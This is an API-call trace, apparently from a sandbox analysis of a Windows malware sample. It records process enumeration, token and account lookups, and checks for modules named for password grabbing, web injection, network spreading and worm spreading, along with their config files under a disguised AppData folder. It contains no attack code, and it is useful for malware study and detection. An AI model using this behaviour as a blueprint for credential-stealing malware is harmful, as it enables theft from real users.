	[0244.019] Process32NextW (in: hSnapshot=0x264, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0244.020] lstrcmpW (lpString1="explorer.exe", lpString2="shirts_cumshots_compaq.exe") returned -1
	[0244.020] Process32NextW (in: hSnapshot=0x264, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0244.021] lstrcmpW (lpString1="explorer.exe", lpString2="league.exe") returned -1
	[0244.021] Process32NextW (in: hSnapshot=0x264, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0244.022] lstrcmpW (lpString1="explorer.exe", lpString2="js_sound.exe") returned -1
	[0244.022] Process32NextW (in: hSnapshot=0x264, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0244.022] lstrcmpW (lpString1="explorer.exe", lpString2="beast-dry.exe") returned 1
	[0244.022] Process32NextW (in: hSnapshot=0x264, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0244.023] lstrcmpW (lpString1="explorer.exe", lpString2="forecastsgeographic.exe") returned -1
	[0244.023] Process32NextW (in: hSnapshot=0x264, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0244.024] lstrcmpW (lpString1="explorer.exe", lpString2="reno.exe") returned -1
	[0244.024] Process32NextW (in: hSnapshot=0x264, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0244.025] lstrcmpW (lpString1="explorer.exe", lpString2="specreformwear.exe") returned -1
	[0244.025] Process32NextW (in: hSnapshot=0x264, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0244.026] lstrcmpW (lpString1="explorer.exe", lpString2="rr_publications.exe") returned -1
	[0244.026] Process32NextW (in: hSnapshot=0x264, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0244.027] lstrcmpW (lpString1="explorer.exe", lpString2="solo.exe") returned -1
	[0244.027] Process32NextW (in: hSnapshot=0x264, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0244.028] lstrcmpW (lpString1="explorer.exe", lpString2="beam.exe") returned 1
	[0244.028] Process32NextW (in: hSnapshot=0x264, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0244.029] lstrcmpW (lpString1="explorer.exe", lpString2="configurations.exe") returned 1
	[0244.029] Process32NextW (in: hSnapshot=0x264, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0244.029] lstrcmpW (lpString1="explorer.exe", lpString2="fact-film-anticipated.exe") returned -1
	[0244.029] Process32NextW (in: hSnapshot=0x264, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0244.030] lstrcmpW (lpString1="explorer.exe", lpString2="wanting villages.exe") returned -1
	[0244.030] Process32NextW (in: hSnapshot=0x264, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0244.079] lstrcmpW (lpString1="explorer.exe", lpString2="engagementresearchersmonkey.exe") returned 1
	[0244.079] Process32NextW (in: hSnapshot=0x264, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0244.080] lstrcmpW (lpString1="explorer.exe", lpString2="surgical-marcus.exe") returned -1
	[0244.080] Process32NextW (in: hSnapshot=0x264, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0244.081] lstrcmpW (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1
	[0244.081] Process32NextW (in: hSnapshot=0x264, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0244.082] lstrcmpW (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1
	[0244.082] Process32NextW (in: hSnapshot=0x264, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0244.082] lstrcmpW (lpString1="explorer.exe", lpString2="taskeng.exe") returned -1
	[0244.083] Process32NextW (in: hSnapshot=0x264, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0244.083] lstrcmpW (lpString1="explorer.exe", lpString2="tadiapce.exe") returned -1
	[0244.083] Process32NextW (in: hSnapshot=0x264, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.084] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0244.084] Process32NextW (in: hSnapshot=0x264, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.085] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0244.085] Process32NextW (in: hSnapshot=0x264, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.086] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0244.086] Process32NextW (in: hSnapshot=0x264, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.087] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0244.087] Process32NextW (in: hSnapshot=0x264, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0244.088] lstrcmpW (lpString1="explorer.exe", lpString2="WmiPrvSE.exe") returned -1
	[0244.088] Process32NextW (in: hSnapshot=0x264, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.089] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0244.089] Process32NextW (in: hSnapshot=0x264, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.090] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0244.090] Process32NextW (in: hSnapshot=0x264, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0244.091] lstrcmpW (lpString1="explorer.exe", lpString2="cmd.exe") returned 1
	[0244.091] Process32NextW (in: hSnapshot=0x264, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0244.092] lstrcmpW (lpString1="explorer.exe", lpString2="conhost.exe") returned 1
	[0244.092] Process32NextW (in: hSnapshot=0x264, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0244.092] lstrcmpW (lpString1="explorer.exe", lpString2="net.exe") returned -1
	[0244.093] Process32NextW (in: hSnapshot=0x264, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0244.093] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0244.093] Process32NextW (in: hSnapshot=0x264, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0244.095] CloseHandle (hObject=0x264) returned 1
	[0244.095] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff948
	[0244.095] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa08
	[0244.095] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2311c60
	[0244.095] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x61c) returned 0x264
	[0244.095] OpenProcessToken (in: ProcessHandle=0x264, DesiredAccess=0x8, TokenHandle=0x128c8c | out: TokenHandle=0x128c8c*=0x6e4) returned 1
	[0244.095] GetTokenInformation (in: TokenHandle=0x6e4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x128c98 | out: TokenInformation=0x0, ReturnLength=0x128c98) returned 0
	[0244.095] GetLastError () returned 0x7a
	[0244.095] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x27dafb0
	[0244.095] GetTokenInformation (in: TokenHandle=0x6e4, TokenInformationClass=0x1, TokenInformation=0x27dafb0, TokenInformationLength=0x24, ReturnLength=0x128c98 | out: TokenInformation=0x27dafb0, ReturnLength=0x128c98) returned 1
	[0244.095] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x27dafb8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xb)), Name=0x128cb0, cchName=0x128c84, ReferencedDomainName=0x128a7c, cchReferencedDomainName=0x128c80, peUse=0x128c7c | out: Name="2XC7u663GxWc", cchName=0x128c84, ReferencedDomainName="ZGW5TDPU", cchReferencedDomainName=0x128c80, peUse=0x128c7c) returned 1
	[0244.096] CloseHandle (hObject=0x6e4) returned 1
	[0244.096] CloseHandle (hObject=0x264) returned 1
	[0244.096] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c28f8
	[0244.096] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff948) returned 1
	[0244.096] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c2920
	[0244.096] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff948
	[0244.096] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2311a50
	[0244.096] lstrcmpiW (lpString1="injectDll32", lpString2="pwgrab32") returned -1
	[0244.096] lstrcmpiW (lpString1="pwgrab32", lpString2="pwgrab32") returned 0
	[0244.096] lstrcmpiW (lpString1="networkDll32", lpString2="pwgrab32") returned -1
	[0244.096] lstrcmpiW (lpString1="psfin32", lpString2="pwgrab32") returned -1
	[0244.096] lstrcmpiW (lpString1="shareDll32", lpString2="pwgrab32") returned 1
	[0244.096] lstrcmpiW (lpString1="wormDll32", lpString2="pwgrab32") returned 1
	[0244.096] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c2920) returned 1
	[0244.096] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2311a50) returned 1
	[0244.097] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff948) returned 1
	[0244.097] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa08) returned 1
	[0244.097] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x2251f8
	[0244.097] GetExitCodeThread (in: hThread=0x13c, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0244.097] GetExitCodeThread (in: hThread=0x140, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0244.097] GetExitCodeThread (in: hThread=0x578, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0244.097] GetExitCodeThread (in: hThread=0x628, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0244.097] GetExitCodeThread (in: hThread=0x5e4, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0244.097] GetExitCodeThread (in: hThread=0x6d4, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0244.097] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2251f8) returned 1
	[0244.097] Sleep (dwMilliseconds=0x4e20) 
	[0244.141] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294f4 | out: lpSystemTimeAsFileTime=0x1294f4*(dwLowDateTime=0x79397f00, dwHighDateTime=0x1d50a6a)) 
	[0244.142] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0244.142] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\dinj" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\dinj"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6ec
	[0244.142] GetFileTime (in: hFile=0x6ec, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x5ba0c660, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x5ba0c660, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x5ba0c660, dwHighDateTime=0x1d50a6a)) returned 1
	[0244.142] CloseHandle (hObject=0x6ec) returned 1
	[0244.142] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x79397f00, dwHighDateTime=0x1d50a6a)) 
	[0244.142] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\sinj" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\sinj"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6ec
	[0244.142] GetFileTime (in: hFile=0x6ec, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x5c68b9e0, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x5c68b9e0, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x5c68b9e0, dwHighDateTime=0x1d50a6a)) returned 1
	[0244.142] CloseHandle (hObject=0x6ec) returned 1
	[0244.142] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x79397f00, dwHighDateTime=0x1d50a6a)) 
	[0244.143] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6ec
	[0244.143] GetFileTime (in: hFile=0x6ec, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x5ceba580, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x5ceba580, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x5cee06e0, dwHighDateTime=0x1d50a6a)) returned 1
	[0244.143] CloseHandle (hObject=0x6ec) returned 1
	[0244.143] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x79397f00, dwHighDateTime=0x1d50a6a)) 
	[0244.143] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0244.143] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\pwgrab32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6ec
	[0244.143] GetFileTime (in: hFile=0x6ec, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x60507b60, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x60507b60, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x6052dcc0, dwHighDateTime=0x1d50a6a)) returned 1
	[0244.143] CloseHandle (hObject=0x6ec) returned 1
	[0244.143] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x79397f00, dwHighDateTime=0x1d50a6a)) 
	[0244.143] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0244.143] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\networkdll32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6ec
	[0244.143] GetFileTime (in: hFile=0x6ec, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x69f02a80, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x69f02a80, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x69f02a80, dwHighDateTime=0x1d50a6a)) returned 1
	[0244.144] CloseHandle (hObject=0x6ec) returned 1
	[0244.144] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x79397f00, dwHighDateTime=0x1d50a6a)) 
	[0244.144] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0244.144] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\psfin32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6ec
	[0244.144] GetFileTime (in: hFile=0x6ec, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x6eff1680, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x6eff1680, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x6eff1680, dwHighDateTime=0x1d50a6a)) returned 1
	[0244.144] CloseHandle (hObject=0x6ec) returned 1
	[0244.144] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x79397f00, dwHighDateTime=0x1d50a6a)) 
	[0244.144] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0244.144] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0244.144] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x129128, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0244.144] PathAddBackslashW (in: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\" | out: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\") returned=""
	[0244.144] FindFirstFileW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\*.*", lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x260ab240, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x76ad4640, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x76ad4640, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x22b7080
	[0244.144] FindNextFileW (in: hFindFile=0x22b7080, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x260ab240, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x76ad4640, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x76ad4640, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0244.145] FindNextFileW (in: hFindFile=0x22b7080, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5992b680, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x5992b680, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x599517e0, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x90bc0, dwReserved0=0x0, dwReserved1=0x0, cFileName="injectDll32", cAlternateFileName="INJECT~1")) returned 1
